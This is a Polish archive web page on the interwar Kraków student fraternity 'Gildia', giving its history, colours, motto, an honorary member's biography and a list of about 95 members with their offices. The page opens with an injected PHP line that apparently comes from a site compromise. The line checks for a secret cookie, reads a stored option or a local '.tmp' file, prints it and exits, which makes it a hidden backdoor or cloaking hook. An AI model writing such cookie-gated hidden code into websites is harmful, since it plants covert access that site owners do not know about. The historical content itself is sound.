if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Gildia

Dekiel Gildii - vide Poszukiwania. Nazwa:
Korporacja Studentów Wyższego Studjum Handlowego „Gildia” w Krakowie (po zmianie nazwy uczelni Korporacja Studentów Akademii Handlowej „Gildia” w Krakowie)
Siedziba:
Kraków
Data powstania:
14 V 1929 r.
Barwy:
ciemnozielona – srebrna – wiśniowa
Dewiza:
„Potentiae economiae Poloniae semper fidelis” („Zawsze wierni sile ekonomicznej Polski”)

Rys historyczny

Listownik Gildii, 1939 r.

Gildia została założona dnia 14 V 1929 r. przez studentów Wyższego Studium Handlowego w Krakowie. Skupiała wyłącznie słuchaczy tej uczelni. Od 1929 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 14 V 1929 r.). Kandydowała pod opieką K! Lauda. Prawa członka rzeczywistego Związku uzyskała dnia 8 grudnia 1930 r.

Kuratorem Korporacji z ramienia uczelni był prof. Albin Żabiński (1931 r.), a siedziba znajdowała się w lokalu Bratniej Pomocy Studentów W.S.H. przy ul. Lenartowicza 11/6 (1938 r.).

Pieczęć Gildii, 1931 r.

Całkowita ustalona, choć niekompletna imienna liczba członków obejmuje 96 nazwisk, w tym jednego członka honorowego.

Brak wiadomości o powojennej działalności Gildii i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Gildii obejmuje niemal 100 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Albin Żabiński, (1883 - 1959) student i absolwent prawa UJ 1904-08, student ekonomii Wiedeńska Akademia Handlowa 1909, dr praw UJ 1910, prof. 1938, współtwórca Wyższego Studium Handlowego w Krakowie (później Akademia Handlowa, obecnie Uniwersytet Ekonomiczny), prorektor 1928-39 i rektor 1939-46 Akademii Handlowej, kurator i Filister honorowy Gildii, aresztowany podczas Sonderaktion Krakau i uwięziony w Sachsenhausen, po zwolnieniu organizator tajnego nauczania, po wojnie zainaugurował działalność Akademii Handlowej, w 1951 administracyjnie zwolniony ze stanowiska prof. Wyższej Szkoły Ekonomicznej w Krakowie

Członkowie rzeczywiści

 1. Ferdynand Bator, skreślony 1931
 2. Jerzy Biały,
 3. Józef Bielski,
 4. Stanisław Błaszczyk,
 5. Bolesław Bytowski, c. 1938, akt. 1938-39
 6. Stanisław Chełchowski, akt. 1938-39
 7. Józef Chmura, c. 1930, akt. 1930-31
 8. Marian Czarnecki, akt. 1938-39, skarbnik sem. let. 1938/39
 9. Stefan Jan Czarnecki, akt. 1938-39
 10. Jan Czech, akt. 1932-34, wiceprezes 1933, prezes sem. let. 1933/34
 11. Władysław Czechowicz, c. 1937, akt. 1937-39, sekretarz sem. let. 1938/39
 12. Wacław Diwiszek, akt. 1934-39
 13. Zbigniew Dobrowolski, c. 1930, akt. 1930-32, gospodarz sem. zim. 1931/32
 14. Stefan Dołżycki, c. 1938, akt. 1938-39
 15. Leopold Drobniak, akt. 1933-34, prezes sem. zim. (?) 1933/34, sekretarz sem. let. 1933/34
 16. Zbigniew Dukiet, akt. 1933-34, prezes 1933, wiceprezes 1934
 17. Stanisław Dzibek, c. 1930, akt. 1930-31
 18. Mieczysław Eibel, c. 1930, akt. 1930-31
 19. Zdzisław Eichler,
 20. Arutur Fichna, akt. 1934
 21. Ernest Gajda, akt. 1935-39, sekretarz sem. let. 1935/36
 22. Wacław Gill, akt. 1929-31, wiceprezes zewn. sem. let. 1930/31
 23. Antoni Gongor, akt. 1934
 24. Wiktor Gorczycki, akt. 1929-31, olderman sem. let. 1930/31
 25. Henryk Gorys, skreślony 1931
 26. Ludwik Graczek, z Jaworzna, c. 1930, akt. 1930-31
 27. Stanisław Gruszka, akt. 1938-39
 28. Kazimierz Gutteter, akt. 1938-39, skarbnik sem. zim. 1938/39, olderman sem. let. 1938/39
 29. Marian Hakemer, ( - 1980), akt. 1929-37, skarbnik sem. let. 1930/31, skarbnik sem. zim. 1931/32, po wojnie na emigracji w Wielkiej Brytanii
 30. Mieczysław Herz, akt. 1929-32, pierwszy prezes 1929, sekretarz, dwukrotny olderman, prezes sem. let. 1930/31, olderman sem. zim. 1931/32
 31. Tadeusz Jachna,
 32. Witold Jaromin, akt. 1934
 33. Władysław Juszkiewicz, akt. 1929-31, sekretarz sem. let. 1930/31
 34. Witold Kaczmarczyk, akt. 1934
 35. Tadeusz Kamiński,
 36. Jan Kasprzyk, akt. 1930-34
 37. Kurt Kissy, akt. 1934-36, prezes sem. let. 1935/36
 38. Eryk Klapetok, akt. 1934
 39. Leon Klimas, akt. 1929, prawd. prezes sem. zim. 1929/30
 40. Władysław Kluz, akt. 1929-31, gospodarz sem. let. 1930/31
 41. Edmund Knobloch, akt. 1938-39
 42. Rudolf Korzeniowski, wydalony 1931
 43. Kazimierz Kostewicz, c. 1930, akt. 1930-31
 44. Henryk Kotyrba,
 45. Stanisław Krasnołucki, z Chrzanowa, c. 1930, akt. 1930-31
 46. Juliusz Kubiak, akt. 1929-31, sekretarz zewn. sem. let. 1930/31
 47. Władysław Kuszkiewicz, akt. 1930-31, sekretarz wewn. sem. let. 1930/31
 48. Józef Kwieciński, c. 1930, akt. 1930-31
 49. Jerzy Link, akt. 1938-39
 50. Kurt Lissy, akt. 1938-39
 51. Franciszek Maas, akt. 1934
 52. Zenon Mandiuk, akt. 1933-34, sekretarz 1933
 53. Stanisław Marszałek,
 54. Bruno Masoń, c. 1938, akt. 1938-39
 55. Henryk Michalak, akt. 1938-39
 56. Adam Michalik, akt. 1933-34, sekretarz sem. zim. (?) 1933/34
 57. Stanisław Mieszalski,
 58. Janusz Mikołajtys, c. 1937, akt. 1937-39
 59. Adam Nowotny, c. 1938, akt. 1938-39
 60. Zbigniew Olszewski, akt. 1934
 61. Zygmunt Pacuła, akt. 1929-34
 62. Władysław Paulo, skreślony 1931
 63. Marian Pawlik,
 64. Alfred Pawlitta, c. 1937, akt. 1937-39
 65. Eugeniusz Peza, c. 1938, akt. 1938-39
 66. Stanisław Pietrusiński, c. 1930, akt. 1930-32, wiceprezes zewn. sem. zim. 1931/32
 67. Karol Purchałka, akt. 1929-31
 68. Władysław Ralicz, c. 1930, akt. 1930-31
 69. Tadeusz Romanowicz, c. 1938, akt. 1938-39
 70. Szymon Rząsa,
 71. Czesław Saller, akt. 1938-39, sekretarz sem. zim. 1938/39
 72. Leopold Sieprawski, z Bochni, akt. 1929-31
 73. Jerzy Sierankiewicz, c. 1938, akt. 1938-39
 74. Tadeusz Sobolewski, akt. 1929-32, prezes sem. zim. 1931/32
 75. Ferdynand Sosna, akt. 1934-35, prezes sem. let. 1934/35
 76. Stefan Stankiewicz, akt. 1929-31
 77. Jan Stettner, akt. 1934-39, prezes sem. zim. 1936/37, olderman sem. zim. 1938/39
 78. Józef Struzik, z Trzebini, c. 1930, akt. 1930-31
 79. Otto Swistuń, akt. 1938-39
 80. Stanisław Szymański, akt. 1938-39, wiceprezes sem. zim. 1938/39, prezes sem. let. 1938/39
 81. Eugeniusz Śliwa, z Dąbrowy k. Tarnowa, akt. 1929-31
 82. Jan Śliwiński, akt. 1929-34, sekretarz sem. zim. 1931/32
 83. Henryk Trąbka, akt. 1938-39, wiceprezes sem. let. 1938/39
 84. Edmund Trojnarski, c. 1930, akt. 1930-32, wiceprezes wewn. sem. zim. 1931/32
 85. Józef Turała,
 86. Stefan Tyrka, c. 1938, akt. 1938-39
 87. Eugeniusz Wiśniewski, akt. 1929-31, wiceprezes wewn. sem. let. 1930/31
 88. Kazimierz Woleński (Wolański), akt. 1934-39
 89. Tadeusz Wysocki, akt. 1929-31
 90. Władysław Zachariasiewicz, c. 1930, akt. 1930-31
 91. Andrzej Zaleski, z Charbina w Mandżurii, akt. 1929-31
 92. Edward Zelezik, akt. 1938-39
 93. Mieczysław Zięba, c. 1930, akt. 1930-31
 94. Stanisław Zięba, c. 1930, akt. 1930-31
 95. Maksymilian Zimmermann, akt. 1931-39, sekretarz sem. zim. 1936/37, prezes sem. zim. 1938/39

Listę członków opracowano na podstawie:

1) „Gildia” Korporacja Studentów Wyższego Studjum Handlowego w Krakowie (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, 37 i n.,
2) Gildia Korporacja Studentów W.S.H. (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 32 i n.,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Gildia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 16 VIII 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Gildia (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 16 VIII 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }